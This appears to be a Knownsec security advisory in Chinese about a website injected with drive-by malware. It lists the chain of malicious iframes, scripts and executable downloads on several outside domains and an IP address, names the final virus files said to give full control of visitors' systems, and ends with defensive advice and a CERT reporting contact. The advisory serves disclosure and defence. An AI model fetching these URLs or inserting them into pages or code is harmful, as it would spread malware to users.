                    [script]http://df4554fer.3322.org/xp/rl.jpg
                        [exe]http://dl7900.3322.org/xp/1.css
                    [script]http://df4554fer.3322.org/xp/kl.jpg
                [iframe]http://df4554fer.3322.org/xp/ytu.htm
                    [iframe]http://df4554fer.3322.org/xp/of.htm
                        [script]http://df4554fer.3322.org/xp/rl.jpg
                        [script]http://df4554fer.3322.org/xp/nop.jpg
                        [script]http://df4554fer.3322.org/xp/fq.jpg
                    [iframe]http://df4554fer.3322.org/xp/yut.htm
                        [iframe]http://df4554fer.3322.org/xp/ytfl1.htm
                [iframe]http://df4554fer.3322.org/xp/t9.htm
                    [script]http://df4554fer.3322.org/xp/rl.jpg
            [script]http://www.sesesemml.cn/dl1.js
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                [script]http://www.sesesemml.cn/images/dl2.js
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
        [iframe]http://a.mmzfc.cn/zz/11.htm?51237957
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
最终下载病毒文件：
http://fuck.ss.la/4.exe
http://dl7900.3322.org/xp/1.css
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：13
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]